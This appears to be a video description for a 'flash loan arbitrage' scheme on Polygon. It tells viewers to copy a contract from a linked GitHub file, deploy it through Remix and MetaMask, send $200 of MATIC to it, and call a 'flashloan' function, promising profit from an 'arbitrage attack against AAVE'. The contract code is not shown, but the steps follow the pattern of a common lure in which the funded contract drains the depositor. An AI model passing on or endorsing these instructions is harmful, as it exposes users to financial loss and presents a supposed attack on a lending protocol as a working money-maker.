Smart Contract Code Link – https://raw.githubusercontent.com/MF-Finance/contracts/main/MaticPolygonArbitrageContract.sol
Remix Link – http://remix.ethereum.org/
Connecting MetaMask to Polygon Mainnet (Matic) – https://medium.com/stakingbits/setting-up-metamask-for-polygon-matic-network-838058f6d844
Flash Loan Explanation – https://academy.binance.com/en/articles/what-are-flash-loans-in-defi
USD to MATIC – https://coincodex.com/convert/matic-network/usd/
TO EARN MORE THAN THE AMOUNT IN THE VIDEO YOU CAN INCREASE GAS FEE
In this video, you can see how I used Flashloans to Arbitrage in Matic Mainnet by deploying Contract/Token to mask our arbitrage attack against AAVE.
*** Working! (Updated on November 17, 2022)
Before starting, install and setup MetaMask in Chrome Browser.
1. Open and setup Remix in browser –https://remix.ethereum.org
2. Copy the Contract code – https://raw.githubusercontent.com/MF-Finance/contracts/main/MaticPolygonArbitrageContract.sol
3. Create new file in Remix and paste Contract code and wait for everything to load, Go to Solidity Compiler and Select compiler to 0.5.0+commit version and hit Compile.
4. In Deploy & Run Transactions, Select Injected Web3 in Environment dropdown menu to connect your MetaMask. On Deploy, Enter your token details and deploy the contract
* If “Estimated gas fee” shows “Unknown processing time” message, you need to increase the fee:
Click “EDIT” ➡ click “Edit suggested gas fee” ➡ click “High” and click “Save”.
5. Get the Contract address from Remix
6. Send $200 of MATIC to the contract for gas fee for all swaps (There are going to be many swaps to use all funds from out liquidity pools.
* If a warning is displayed, click “I understand”.
7. Call ‘flashloan’ function in Remix.
Thanks for watching!